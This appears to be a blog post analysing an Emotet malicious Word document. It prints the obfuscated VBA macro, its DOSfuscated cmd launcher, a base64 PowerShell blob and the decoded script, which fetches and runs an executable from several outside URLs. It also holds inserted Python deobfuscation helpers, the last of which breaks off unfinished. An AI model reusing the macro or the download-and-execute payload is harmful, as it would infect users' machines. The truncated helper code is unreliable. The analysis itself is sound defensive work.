The Emotet Trojan: A Tale of Two Malware Samples

This blog post serves to further examine the Emotet Malware, while also telling the tale of another interesting observation that is something to watch out for with this particular Trojan.

I've been examining Emotet's malicious documents a lot lately, since this malware campaign is on everyone’s lips, and I wanted to take a moment to point out an interesting observation I ran into a few days ago.

As a rough sketch, here’s what Emotet does all day: Millions of people receive spam emails designed to look like package shipping notices, or billing invoices, or other plausible documents that people would normally receive, somewhat like a phishing campaign. These emails then either have a Word doc file attached to them, or a URL link in the email that points to a Word doc file. Then, when you open that doc file, you’re presented with a fake template telling you that your copy of Word is configured improperly and implores you to fix that. (Pro Tip: The only thing incorrect about it is the part where it’s not letting the document’s AutoOpen() macro execute and do bad things to you.) Then, some subset of millions of people go ahead and Enable Macros, and set themselves up for a meeting with their IT department.

So, let's have a look at one of these maldocs. How about the sample with the SHA1 hash 7de95cb762eb9a6c0911d054fc4adab529185f41?

That's definitely an Emotet maldoc.

Inside this maldoc, we find a nasty pile of Visual Basic macro code:

	Attribute VB_Name = "oGhNIGEoMzPhc"
	Function wbEBOkTwF()
	On Error Resume Next
	iHNMbj = 46446 / wwwpVf
	   iHNMbj = 93358 / YhVEE - jKFCQ - BthZR
	   IsArray nhsYw - ArBsfn
	ifOSuz = "Md /v:^on^ ^  ^ /r" + CStr(Chr(EXVUXjiYRToZM + oJflHUWcJUB + 34 + DALsKFcubF + wEwPJaiCfkbl)) + "s^e^T"
	VarType CDate(143449149)
	XGdutGirnDA = " ^    ^X^H^=^pow^er(0e^ll^ -^e^ ^J^:B^E:H^I^"
	VarType CCur(XilZnu / LMbaj)
	   IsArray YMiWXK / TGspYZ * kUqzwu / zJiAnn
	bzDSmnWj = ":^Sw^:9:G{^:Z^,^B3^:C^#:bwBi^:^G^o^:Z,"
	iHNMbj = Hex(lbDzWk - finSh - PjKjG - FrsVQ)
	   IsArray Sqr(37376 + IVJHal - 68087 - rCEbsk)
	   IsArray Sin(RZmthz)
	   IsArray Month(Narlc)
	wuBGC = "B^4^:H,^:^I:^B.^:^GU^:d"
	iHNMbj = CDate(658)
	   IsArray CDate(369)
	   iHNMbj = Month(88)
	zDwYTqNUNw = "^:^:/^:^Fq:Z^,Bi:^E;:b^:Bp:G^"
	iHNMbj = Atn(75)
	   IsArray Second(UXVoZC)
	iHmVqhAG = "U:^bgB#:D(:^J:^B^L:^H^Y^:,g"
	IsArray Log(83727 - 45846)
	   VarType QHiHhu * FnFlSz / 86839 + FVLSsD
	   VarType Sqr(tclUXh)
	sqzMd = "^:^9^:Cq^:a^:B#^:H^,:q:^:^6:C8^:^L^w"
	IsArray 51613 + 49369
	   IsArray 41833 * Dpopia
	   VarType Sin(69)
	ztzUdYjbYS = "Bk^:Gk:Z^wB^p:^H,^:Y,^B(:C{^:^Z,B#^:^G{^:^Y,Bz^:G8:^Z^"
	VarType Oct(wUsdSK)
	   iHNMbj = Atn(61540 - EruNad - 16717 * fwZVYw)
	   VarType IBmRM / UGchY + RzzZp * dijda
	   VarType HCXDC * WcOdDT + COqrz - 73025
	LiNmOlLjAj = "g^B^#^:C^{^:^Z,B^1:C^8:Uw^B:^:"
	IsArray Round(32424 / GjujO)
	   VarType TimeValue(IiiajV)
	   IsArray 24606 - 10082
	fdtArdNdZjl = "Gg^:d:B#^:H::^.^g^:v^:C8^:^q^wBv^:G^;:^a^,^B"
	VarType CVar(MzWTnA)
	   VarType Month(3984)
	HFbnRIPhMjZ = "v^:^G^#:Y,B2^:^G^U:^bg^:/^:G;^:bwB^t^:C^8:^d^"
	wbEBOkTwF = ifOSuz + XGdutGirnDA + bzDSmnWj + wuBGC + zDwYTqNUNw + iHmVqhAG + sqzMd + ztzUdYjbYS + LiNmOlLjAj + fdtArdNdZjl + 	HFbnRIPhMjZ
	   IsArray Atn(45)
	   iHNMbj = Log(59500 * 52241 - DcKmcC - DqEtWI)
	   IsArray 21833 / nAPKzj
	End Function
	Function zZJzKY()
	On Error Resume Next
	VarType TypeName(FzKzp)
	   VarType 99994 - 78258
	   iHNMbj = Atn(mioVj)
	   VarType CVar(8)
	   VarType CDbl(ZIHMSJ)
	iYbfU = ",^B0:G(:^S^g^:#^:^E:^:^a^:^B^#^:H^,^:q^::6^:"
	VarType CrovPD + 23590
	   iHNMbj = 30613 - iTEAa * QOOVY * WTqhT
	cwFoEaZvHDh = "C^8:L^wBp:H;:bw^B4:^Gk:^Y"
	iHNMbj = Second(dfRjJc)
	   iHNMbj = CDate(YhqwD - SklcrJ + UpoNZ * XpzNQd)
	   iHNMbj = CDate(87552 - zzKjK)
	   IsArray Round(JLzKUG)
	   VarType WYJnJ * IuzBG
	acioUa = "^,^B(:G^k^:^d^:B^l:H^;^:^Lg^B4:G8^:b^,^:/:G^{"
	VarType 54961 + hwzZrm * lwuJf * 58740
	   VarType Atn(aSijw)
	cDAXDMloG = "^:^Z^w:v:^D^;:^a:B;^:H^g^:V^,B^1:G^,^:NwB^:^:"
	iHNMbj = 98275 * wQLstc
	   IsArray TypeName(452)
	   VarType hMNMdp + XTibo * MhTpu * ilHRZq
	   IsArray Log(awpTR)
	bJKUi = "^G^g^:^d:^B#:^H::.g:v^:C8^:b^,B"
	IsArray 70091 * VwavnV - 8266 + szXoH
	   iHNMbj = Second(SfjMp)
	   iHNMbj = 13327 * wVYij - 72184 - 18440
	EzvoYzw = "v^:H^Y^:^Z,^Bp:H^;:Z^wBv^:^G,:b^w^B"
	zZJzKY = iYbfU + cwFoEaZvHDh + acioUa + cDAXDMloG + bJKUi + EzvoYzw
	   IsArray 48950 - KisNQj + aGpKL + aJkfRi
	   iHNMbj = CStr(uHZBi - ZDwYVO)
	   VarType Xtnzk + EovAY
	   iHNMbj = TypeName(CvkoZ)
	End Function
	Function joLbP()
	On Error Resume Next
	IsArray Cos(5)
	   iHNMbj = Str(31405 - CsLLzv * 71381 * wvIRSp)
	   iHNMbj = 40288 + 33998
	   VarType Hex(2)
	   VarType Cos(SjEJm)
	DViVP = "^p^:C{:^Yw^Bv:^G^#:^L^g^Bi^:^HI^:L^w^B^Z^:H^I^:R"
	iHNMbj = CStr(2814)
	DzTTT = "^,:^z:D^I^:Vw^BN^:^E^,^:^,:B"
	iHNMbj = Sgn(358)
	   VarType TypeName(633)
	   IsArray 80382 / Hwbha
	wadHL = "^o^:H^,^:^d:^B^w^:^D^o^:L^w^:v^:^G^{:a,B2:G^E:qwBp:C^{^:"
	iHNMbj = Val(4)
	   VarType CByte(53)
	kHRjnq = "a^,B/:C^8^:Uw:^`:C{:^UwB^w:^Gw:^a^,^B^#:Cg^:^Jw^B:^:Cq^:^K"
	iHNMbj = dObNzo * FCkjHC - FLCrjW / HiBUq
	RiEjupYs = ",^:^7:C,:Z^gB3:H^o:^I^:^:"
	iHNMbj = CDate(7315)
	iiMCLUSszdr = "9:C:^:^Jw:^{^:^D^U:.,:^`^:^D(:J:B^I:E{^:q^::9:C,^:^Z,B/:H"
	VarType Sqr(jFwYYv)
	   iHNMbj = Log(579)
	lHITPMr = "Y:^.^gB^w^:H^U:Y^gB(:Gk"
	IsArray RmcapZ * VEszi * 6615 / WfatJ
	   IsArray Sqr(2)
	   iHNMbj = Str(623)
	   VarType Round(33403 / ftsYzc)
	GwaCl = ":^Yw:r^:Cq:^X^:^:^`:C(:^J:^Bm:H^q^:^eg:r:Cq:LgB"
	joLbP = DViVP + DzTTT + wadHL + kHRjnq + RiEjupYs + iiMCLUSszdr + lHITPMr + GwaCl
	   IsArray iIUGb / 59804 + 31980 * oBftF
	   IsArray TimeValue(ihRcd)
	   VarType Val(lOcUA)
	   iHNMbj = 93605 * swCzuW
	End Function
	Function PZiIj()
	On Error Resume Next
	VarType Val(98225 - sddzA * nsAAo - 78027)
	SXPjvZbo = "^l:H^g:^Z^,^:`:^D(^:ZgBv^:HI^:^Z,^B0^:G;:^a^:"
	IsArray CCur(535)
	   VarType qMXtN - YAktid
	PYWHFroKw = "^:o:C,:V^gB^3^:G^g:I^:Bp^:G{^:"
	IsArray huZcc + chdPIJ - 80212 / FAEEc
	   iHNMbj = Round(48)
	   VarType LCase(zoGQt)
	GvORZGk = "I^::^k^:E(^:d^gBC:Ck^:^ewB#^:^H"
	iHNMbj = oLwCHM * 1850 * 26068 + njRto
	   iHNMbj = CDate(962)
	   VarType hDbVp * dvSWF
	wzocGwdfHPt = "I^:e,^B^7^:C^,^:R^:^B^$:E(^:L^g^BE:^G8^:^d^w"
	IsArray ZUuAtL / zFmcJ
	   IsArray Rnd(GAMlr - BcnRA)
	   iHNMbj = mkLHLs * aFuUw / QrEwbb + BPEdNw
	DWDsNkSIYG = "B/:^Gw^:bwB0^"
	PZiIj = SXPjvZbo + PYWHFroKw + GvORZGk + wzocGwdfHPt + DWDsNkSIYG
	   iHNMbj = Log(9)
	End Function
	Function lhHCia()
	On Error Resume Next
	iHNMbj = CBool(oWfitP)
	   VarType Sin(24)
	   IsArray CStr(MHJXrq)
	ZTdlqhQI = ":G^,:R^gBp^:^Gw^:Z^,:o^:C^,:V^gB"
	VarType 85274 + 84181
	   IsArray 70477 + lBcEcJ - dUXsM / pqQFX
	   iHNMbj = Val(830 * ATCTQs)
	   IsArray 18895 * RjKOzm
	GWOCD = "3^:Gg^:^L::g^:C,^:^S:B^.^:H^::K^,:^7:^E^"
	iHNMbj = CStr(59257 + rIIft)
	   iHNMbj = Sqr(szQDt - KKlhi / 73397 - HVMiWn)
	   VarType Log(rUobX)
	   VarType qGDiIj / ViZcwI
	   iHNMbj = 84390 * zmYbRm * rTzuO * snUcvN
	boYhTUQV = "k^:^bgB2:^G8^:a^w^B^l:C#:^S^,^B#^:GU^:b^,^:g:C^,^:S^:"
	IsArray Second(2384)
	   IsArray CDec(4009)
	   IsArray Str(67831 / AzppD)
	   IsArray 70021 - tEiibp - itzibf / KbthKC
	   VarType 78399 + tFWvaJ / 12006 / nIzWzK
	TjSPiDZHXC = "B.^:H:^:.wB^i^:^HI:Z,^B0:^G(:^.wB9:^"
	IsArray 90172 * YHiFFH + ZFtLZm + uTiIK
	   iHNMbj = CDec(zoBuz)
	jGiKtziiDru = "G;:Y^,^B^#^:G;:"
	IsArray LCase(FAzAZ)
	   iHNMbj = Sin(ChIMH - OdhaT)
	   VarType CVar(881)
	   IsArray Int(61670 + BOMRj + 49941 / RrVJdc)
	KQZLmjqDSo = "a:B^7^:^H#:^f^,:g:C:^:I::^g:C^:^:^I::g^:C^:"
	iHNMbj = TypeName(Rhvhf + GTqJb)
	   iHNMbj = Rnd(MYpnkf * NtjLrV / 17388 * wfPcs)
	   IsArray 21136 * pNtqr - wCTMM * 39779
	   iHNMbj = Int(519)
	dlwaYoiwNpF = ":^I^:^:g:C::I^:^:^g^:C"
	IsArray IsCzk - ZpBQC
	   IsArray qVauz / AKjba
	   iHNMbj = TypeName(30124 / jFTjm)
	FQsXbiSPqzr = ":^:I::g^:C^::&    s^e^T ^ ^H^q=!^XH^:^q=c!&&S"
	VarType CVar(77)
	   IsArray 75143 / pujsui
	   IsArray Kohuu + GAUGm
	   iHNMbj = Oct(21)
	fnqCJ = "^E^T    ^43^G=^!^H^q^:^0^=h!&&"
	lhHCia = ZTdlqhQI + GWOCD + boYhTUQV + TjSPiDZHXC + jGiKtziiDru + KQZLmjqDSo + dlwaYoiwNpF + FQsXbiSPqzr + fnqCJ
	   IsArray CCur(2)
	   iHNMbj = aViLYX / 24379 + WRmmr + AHYwNu
	End Function
	Function BzEQV()
	On Error Resume Next
	iHNMbj = CDbl(517)
	bTiIpknZQjF = " s^Et ^ ^  ^ k^ePY=^!^4^3^G^"
	iHNMbj = Str(WcIYh - mhAsl)
	   VarType Fix(9079)
	AiIYaTZwDTc = ":`^=n^!&&   s^e^T ^L^G0=!^k^e^P^Y^:$=^"
	iHNMbj = Fix(7)
	   iHNMbj = Str(iQTDIo)
	cCcIfS = "y!&&    se^t  ^  ^ ^7M1^S=^!^L^G0^:^4^=^j!&  "
	iHNMbj = FbhSin - SpBuE
	   iHNMbj = 79213 / zEqjOk - 29954 * zQjWk
	HaTrOa = "  S^E^t ^  c^KmC=^!^7M^1^S:(^=s!"
	VarType Rnd(MOzbpE * WEVES)
	   iHNMbj = CStr(azbTD)
	mDDhMav = "&s^E^T ^  ^  v^B^6^a=!c^K^mC^"
	VarType 82032 * lkKOJ
	   VarType fqpNiC * RfJcTi / nNJupU - 59728
	   iHNMbj = 62792 * jfpjuQ + JkfjH + cVLYnp
	QPfwcbzO = ":^,=^Q^!&&s^Et ^ ^ ^  A^j^p=!v^"
	IsArray Hex(BlJshD + 24796 + 28734 - OESjD)
	vfWaB = "B^6^a:.=^O^!&&    s"
	IsArray Log(52058 * ZdwrDl)
	LYjPHGEI = "^eT ^ ^  Vn=^!^A^j^p^:^:^=^A!&se^t ^ ^   ^Y^a=!Vn:^#^=^0"
	VarType ncjkfK - XmOJHq
	   iHNMbj = ztuSzJ / aqYdh
	   VarType Second(4)
	   iHNMbj = 10726 * jGwvH
	   VarType Fix(IWcaJ)
	MMvmN = "!&& SE^T NCt=^!^Y^a:^{^=^4^!&&   SE^T  ^gn0^9=^!NC^t:/^=^u!&  s^"
	iHNMbj = Second(3212)
	   IsArray CCur(Ginadv + pMbvsi + LbSPZ / jIrTZ)
	   VarType BAGUvF - 79299 * FrjEcF - wfuzd
	qQQMSGVrX = "et ^   ^ ^EH=^!^gn^0^9^:;^=^M^!&C^A^L^"
	VarType uIbGz * 75244
	   iHNMbj = Oct(KMfoF)
	dorLEk = "l %^EH%   " + CStr(Chr(UhvLzWYJU + wOHTjMDD + 34 + QZMAuTIt + ZWwkvwQFFL)) + "    "
	BzEQV = bTiIpknZQjF + AiIYaTZwDTc + cCcIfS + HaTrOa + mDDhMav + QPfwcbzO + vfWaB + LYjPHGEI + MMvmN + qQQMSGVrX + dorLEk
	   VarType Hex(79)
	   iHNMbj = CStr(pjGjiK)
	End Function
	
	Attribute VB_Name = "VndRBbniaq"
	
	Sub AutoOpen()
	On Error Resume Next
	CreateObject("WScript.Shell").Run! "C" + ztXZmEVS + hzGljvbXiwb + wbEBOkTwF + zZJzKY + joLbP + PZiIj + lhHCia + BzEQV + vSQMiWUrR + 	zTLkXKmtJwXBoa, 843069887 - 843069887
	End Sub

Ugh. That's awful. Let's clean that up a little bit so we can read it, okay? You see there, where it does "CreateObject()" ? That's going to build a command-line out of all those randomly named pieces of string. Those pieces of string are made of smaller pieces of string in the pile of garbage up above.  

We're screwed.

We're going to have to interpret this pile of Visual Basic.

Et voilà... That gives us a command line that's going to be passed to WScript.Shell (which is VBA's system() call) that looks like:

'CMd /v:^on^ ^  ^ /r" + CStr(Chr(EXVUXjiYRToZM + oJflHUWcJUB + 34 + DALsKFcubF + wEwPJaiCfkbl)) + 
"s^e^T ^    ^X^H^=^pow^er(0e^ll^ -^e^ 
^J^:B^E:H^I^:^Sw^:9:G{^:Z^,^B3^:C^#:bwBi^:^G^o^:Z,B^4^:H,^:^I:^B.^:^GU^:d^:^:/^:^Fq:Z^,Bi:^E;:b^:
Bp:G^U:^bgB#:D(:^J:^B^L:^H^Y^:,g^:^9^:Cq^:a^:B#^:H^,:q:^:^6:C8^:^L^wBk^:Gk:Z^wB^p:^H,^:Y,^B(:C{^:
^Z,B#^:^G{^:^Y,Bz^:G8:^Z^g^B^#^:C^{^:^Z,B^1:C^8:Uw^B:^:Gg^:d:B#^:H::^.^g^:v^:C8^:^q^wBv^:G^;:^a^,
^Bv^:^G^#:Y,B2^:^G^U:^bg^:/^:G;^:bwB^t^:C^8:^d^,^B0:G(:^S^g^:#^:^E:^:^a^:^B^#^:H^,^:q^::6^:C^8:L^
wBp:H;:bw^B4:^Gk:^Y^,^B(:G^k^:^d^:B^l:H^;^:^Lg^B4:G8^:b^,^:/:G^{^:^Z^w:v:^D^;:^a:B;^:H^g^:V^,B^1:
G^,^:NwB^:^:^G^g^:^d:^B#:^H::.g:v^:C8^:b^,Bv^:H^Y^:^Z,^Bp:H^;:Z^wBv^:^G,:b^w^B^p^:C{:^Yw^Bv:^G^#:
^L^g^Bi^:^HI^:L^w^B^Z^:H^I^:R^,:^z:D^I^:Vw^BN^:^E^,^:^,:B^o^:H^,^:^d:^B^w^:^D^o^:L^w^:v^:^G^{:a,B
2:G^E:qwBp:C^{^:a^,B/:C^8^:Uw:^`:C{:^UwB^w:^Gw:^a^,^B^#:Cg^:^Jw^B:^:Cq^:^K,^:^7:C,:Z^gB3:H^o:^I^:
^:9:C:^:^Jw:^{^:^D^U:.,:^`^:^D(:J:B^I:E{^:q^::9:C,^:^Z,B/:HY:^.^gB^w^:H^U:Y^gB(:Gk:^Yw:r^:Cq:^X^:
^:^`:C(:^J:^Bm:H^q^:^eg:r:Cq:LgB^l:H^g:^Z^,^:`:^D(^:ZgBv^:HI^:^Z,^B0^:G;:^a^:^:o:C,:V^gB^3^:G^g:I
^:Bp^:G{^:I^::^k^:E(^:d^gBC:Ck^:^ewB#^:^HI^:e,^B^7^:C^,^:R^:^B^$:E(^:L^g^BE:^G8^:^d^wB/:^Gw^:bwB0
^:G^,:R^gBp^:^Gw^:Z^,:o^:C^,:V^gB3^:Gg^:^L::g^:C,^:^S:B^.^:H^::K^,:^7:^E^k^:^bgB2:^G8^:a^w^B^l:C#
:^S^,^B#^:GU^:b^,^:g:C^,^:S^:B.^:H:^:.wB^i^:^HI:Z,^B0:^G(:^.wB9:^G;:Y^,^B^#^:G;:a:B^7^:^H#:^f^,:g
:C:^:I::^g:C^:^:^I::g^:C^::^I^:^:g:C::I^:^:^g^:C:^:I::g^:C^::&    s^e^T ^ ^H^q=!^XH^:^q=c!&&S^E^T
    ^43^G=^!^H^q^:^0^=h!&& s^Et ^ ^  ^ k^ePY=^!^4^3^G^:`^=n^!&&   s^e^T ^L^G0=!^k^e^P^Y^:$=^y!&& 
    se^t  ^  ^ ^7M1^S=^!^L^G0^:^4^=^j!&    S^E^t ^  c^KmC=^!^7M^1^S:(^=s!&s^E^T ^  ^  
    Vn=^!^A^j^p^:^:^=^A!&se^t ^ ^   ^Y^a=!Vn:^#^=^0!&& SE^T NCt=^!^Y^a:^{^=^4^!&&   SE^T  
^gn0^9=^!NC^t:/^=^u!&  s^et ^   ^ ^EH=^!^gn^0^9^:;^=^M^!&C^A^L^l %^EH%   " + CStr(Chr(UhvLzWYJU + 
wOHTjMDD + 34 + QZMAuTIt + ZWwkvwQFFL)) + "    '
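Rather than interpreting the pile by eye, this is the kind of throwaway script I'd write to do it. It is an added example, not part of the original post or of the sample: it walks each Function, keeps only the assignments that build strings, evaluates Chr(a + b + 34 + c) as Chr(34) because undeclared names are Empty under On Error Resume Next, and concatenates the pieces in the order the AutoOpen() call names them. It assumes the CreateObject("WScript.Shell").Run form shown above and runs on a constructed miniature of the module (all names made up), not on the real sample.

```python
import re

# Constructed miniature of the module layout shown above; every name is made up and
# the real modules pad each string assignment with dozens of junk statements.
SAMPLE_VBA = '''
Attribute VB_Name = "moduleOne"
Function partOne()
On Error Resume Next
junk = 46446 / neverDefined
   IsArray Sqr(37376 + other - 68087)
first = "Md /v:^on^ /r" + CStr(Chr(aaa + bbb + 34 + ccc)) + "s^e^T"
   VarType CDate(143449149)
second = " ^X^H^=^pow^er(0e^ll"
partOne = first + second
   junk = Log(59500 * 52241 - neverDefined)
End Function
Function partTwo()
On Error Resume Next
third = " -e^ AAA"
fourth = CStr(Chr(ddd + 34 + eee)) + "  "
partTwo = third + fourth
End Function

Attribute VB_Name = "moduleTwo"

Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! "C" + neverDefinedA + partOne + partTwo + neverDefinedB, 843069887 - 843069887
End Sub
'''

FUNC_RE = re.compile(r'^\s*Function\s+(\w+)\s*\(\)\s*$(.*?)^\s*End Function', re.M | re.S)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$', re.M)
# One string-building operand: "literal", CStr(Chr(...)) / Chr(...), or an identifier.
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|(?:CStr\()?Chr\(([^()]*)\)\)?|([A-Za-z_]\w*)')
RUN_RE = re.compile(r'\.Run!?\s+(.+?),\s*[\d\s+\-]+$', re.M)


def eval_concat(expr, scope):
    """Evaluate a VBA '+' chain of string literals, Chr() calls and identifiers."""
    parts = []
    for m in TOKEN_RE.finditer(expr):
        literal, chr_arg, ident = m.groups()
        if literal is not None:
            parts.append(literal.replace('""', '"'))   # VBA doubles quotes inside strings
        elif chr_arg is not None:
            # Undeclared names are Empty, i.e. 0, under On Error Resume Next, so
            # Chr(a + b + 34 + c) is Chr(34): the double quote around the /r argument.
            parts.append(chr(sum(int(t) for t in chr_arg.split('+') if t.strip().isdigit())))
        else:
            parts.append(scope.get(ident, ''))         # unknown name -> Empty -> ""
    return ''.join(parts)


def resolve_functions(vba):
    """Map each Function name to the string it returns, ignoring the arithmetic junk."""
    funcs = {}
    for name, body in FUNC_RE.findall(vba):
        scope, ret_expr = {}, None
        for lhs, rhs in ASSIGN_RE.findall(body):
            if lhs == name:                        # 'name = a + b + c' is the return value
                ret_expr = rhs
            elif '"' in rhs or 'Chr(' in rhs:      # only the string-building lines matter
                scope[lhs] = eval_concat(rhs, scope)
        funcs[name] = eval_concat(ret_expr, scope) if ret_expr else ''
    return funcs


def build_command_line(vba):
    """Reassemble the command line handed to WScript.Shell.Run in AutoOpen()."""
    m = RUN_RE.search(vba)
    if not m:
        raise ValueError('no WScript.Shell .Run call found')
    return eval_concat(m.group(1), resolve_functions(vba))


if __name__ == '__main__':
    print(build_command_line(SAMPLE_VBA))
```

The trick that makes this cheap is that nothing in the junk lines feeds into the strings: only assignments containing a quoted literal or a Chr() call are evaluated, everything else is arithmetic on Empty that On Error Resume Next swallows. The second sample's Shell% launcher with its KeyString() call is not handled here; that would need one more operand type in TOKEN_RE.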

Oh holy hell in a handbasket... It's DOSfuscated. Let's unpack that a bit. It's going to require simulating what cmd.exe does with it, and ultimately cmd.exe is going to run:

powershell -e JABEAHIASwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABLAHYAQgA9ACcAa
AB0AHQAcAA6AC8ALwBkAGkAZwBpAHQAYQBsAC4AZQB0AG4AYQBzAG8AZgB0AC4AZQB1AC8AUwBAAGgAdAB0AHAAOgAvAC8Acw
BvAGMAaQBvAG0AYQB2AGUAbgAuAGMAbwBtAC8AdQBhAGsASgA0AEAAaAB0AHQAcAA6AC8ALwBpAHMAbwBjAGkAYQBsAGkAdAB
lAHMALgBjAG8AbQAuAG4AZwAvADMAaABMAHgAVQB1AGQANwBAAGgAdAB0AHAAOgAvAC8AbQBvAHYAZQBpAHMAZwBvAGQAbwBp
AC4AYwBvAG0ALgBiAHIALwBZAHIARQAzADIAVwBNAEQAQABoAHQAdABwADoALwAvAG4AaQB2AGEAcwBpAC4AaQBuAC8AUwAnA
C4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAZgB3AHoAIAA9ACAAJwA4ADUAOQAnADsAJABIAE4AcAA9ACQAZQBuAHYAOgBwAH
UAYgBsAGkAYwArACcAXAAnACsAJABmAHcAegArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVgB3AGgAIABpAG4
AIAAkAEsAdgBCACkAewB0AHIAeQB7ACQARAByAEsALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVgB3AGgALAAgACQA
SABOAHAAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQASABOAHAAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0Af
QAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA

Argh, gdd*&*@(#mmo)mmit... Not only is cmd.exe launching powershell, but some "helpful" person decided it was a great idea to let powershell just run random blobs of base64 encoded payload. Let's see what's inside that mess:

"$\x00D\x00r\x00K\x00=\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 
\x00N\x00e\x00t\x00.\x00W\x00e\x00b\x00C\x00l\x00i\x00e\x00n\x00t\x00;\x00$\x00K\x00v\x00B\x00=\x
00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00d\x00i\x00g\x00i\x00t\x00a\x00l\x00.\x00e\x00t\x00n\x00
a\x00s\x00o\x00f\x00t\x00.\x00e\x00u\x00/\x00S\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00s\x00o\
x00c\x00i\x00o\x00m\x00a\x00v\x00e\x00n\x00.\x00c\x00o\x00m\x00/\x00u\x00a\x00k\x00J\x004\x00@\x0
0h\x00t\x00t\x00p\x00:\x00/\x00/\x00i\x00s\x00o\x00c\x00i\x00a\x00l\x00i\x00t\x00e\x00s\x00.\x00c
\x00o\x00m\x00.\x00n\x00g\x00/\x003\x00h\x00L\x00x\x00U\x00u\x00d\x007\x00@\x00h\x00t\x00t\x00p\x
00:\x00/\x00/\x00m\x00o\x00v\x00e\x00i\x00s\x00g\x00o\x00d\x00o\x00i\x00.\x00c\x00o\x00m\x00.\x00
b\x00r\x00/\x00Y\x00r\x00E\x003\x002\x00W\x00M\x00D\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00n\
x00i\x00v\x00a\x00s\x00i\x00.\x00i\x00n\x00/\x00S\x00'\x00.\x00S\x00p\x00l\x00i\x00t\x00(\x00'\x0
0@\x00'\x00)\x00;\x00$\x00f\x00w\x00z\x00 \x00=\x00 \x00'\x008\x005\x009\x00'\x00;\x00$\x00H\x00N\x00p\x00=\x00$\x00e\x00n\x00v\x00:\x00p\x00u\x00b\x
00l\x00i\x00c\x00+\x00'\x00\\\x00'\x00+\x00$\x00f\x00w\x00z\x00+\x00'\x00.\x00e\x00x\x00e\x00'\x0
0;\x00f\x00o\x00r\x00e\x00a\x00c\x00h\x00(\x00$\x00V\x00w\x00h\x00 \x00i\x00n\x00 \x00$\x00K\x00v\x00B\x00)\x00{\x00t\x00r\x00y\x00{\x00$\x00D\x00r\x00K\x00.\x00D\x00o\x00w\x00n\x
00l\x00o\x00a\x00d\x00F\x00i\x00l\x00e\x00(\x00$\x00V\x00w\x00h\x00,\x00 \x00$\x00H\x00N\x00p\x00)\x00;\x00I\x00n\x00v\x00o\x00k\x00e\x00-\x00I\x00t\x00e\x00m\x00 \x00$\x00H\x00N\x00p\x00;\x00b\x00r\x00e\x00a\x00k\x00;\x00}\x00c\x00a\x00t\x00c\x00h\x00{\x00}\x
00}\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00"

Nice. It's UTF-16LE (the encoding PowerShell's -e switch expects), which is why every other byte is a null. It’s always something. Let's make that readable for humans.

"$DrK=new-object Net.WebClient;$KvB='http://digital.etnasoft.eu/S@http://sociomaven.com/uakJ4@http://isocialites.c
om.ng/3hLxUud7@http://moveisgodoi.com.br/YrE32WMD@http://nivasi.in/S'.Split('@');$fwz = '859';$HNp=$env:public+'\\'+$fwz+'.exe';foreach($Vwh in $KvB){try{$DrK.DownloadFile($Vwh, $HNp);Invoke-Item $HNp;break;}catch{}}  
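Here is what "simulating what cmd.exe does with it" looks like in code, carried through to the decoded script. This is an added example, not code from the post. It models only the parts of cmd.exe this obfuscator leans on: caret escapes, & and && separators, SET, the !VAR:search=replace! delayed-expansion substitution, and CALL re-parsing its argument so that a %VAR% which survived the first pass expands on the second. The launcher it runs on is a constructed one in the same style; its variable names, substitution chain and payload (which decodes to $a=1) are all made up, and the chain is ordered the same way as the real one so that the character introduced by one substitution is not clobbered by an earlier one.

```python
import base64
import re

# Constructed launcher in the style of the one above (names, chain and payload made up).
SAMPLE_CMD = (
    'CMd /v:^on^ ^  ^ /r"s^e^T ^  ^X^H^=pow0rsh0ll^ -0^ J:Bh:D#:MQ:=&&'
    's^e^T ^ ^H^q=!^XH^:0=e!&&S^E^T ^43^G=^!^H^q^:^#^=0!&&'
    '   s^e^t ^k^ePY=!^4^3^G::=^A!&C^A^L^l %^k^ePY%   "    '
)

# !VAR! or !VAR:search=replace! (the ~start,len substring form is not modelled).
DELAYED = re.compile(r'!([^!:]+?)(?::([^=!]+)=([^!]*))?!')
PERCENT = re.compile(r'%(\w+)%')
LAUNCHER = re.compile(r'(?is)^\s*cmd\s+/v:(?:on)?\s*/r\s*"(.*)"\s*$')


def strip_carets(text):
    """cmd.exe phase-2 parsing: '^x' is read as the literal 'x'."""
    return re.sub(r'\^(.)', r'\1', text, flags=re.S)


def expand_delayed(text, env):
    """Delayed expansion; the search in !VAR:search=replace! is case-insensitive."""
    def repl(m):
        name, search, replace = m.groups()
        value = env.get(name.upper(), '')
        if search is not None:
            value = re.sub(re.escape(search), lambda _: replace, value, flags=re.I)
        return value
    return DELAYED.sub(repl, text)


def emulate_cmd(launcher):
    """Return the commands cmd.exe would finally run for a 'cmd /v:on /r "..."' line."""
    m = LAUNCHER.match(strip_carets(launcher))
    if not m:
        raise ValueError('not a cmd /v:on /r "..." launcher')
    env, executed = {}, []
    for cmd in re.split(r'&&?', m.group(1)):      # '&' and '&&' both chain commands here
        cmd = cmd.strip()
        if not cmd:
            continue
        verb, _, arg = cmd.partition(' ')
        verb = verb.upper()
        if verb == 'SET':
            name, _, value = expand_delayed(arg, env).partition('=')
            env[name.strip().upper()] = value
        elif verb == 'CALL':
            # CALL re-parses its argument, so the %VAR% that survived the first pass
            # (the caret inside the name kept it from expanding) expands now.
            executed.append(PERCENT.sub(lambda mm: env.get(mm.group(1).upper(), ''), arg).strip())
        else:
            executed.append(cmd)
    return executed


def decode_encoded_command(command):
    """Decode 'powershell -e <base64>': the blob is UTF-16LE, hence a NUL after every char."""
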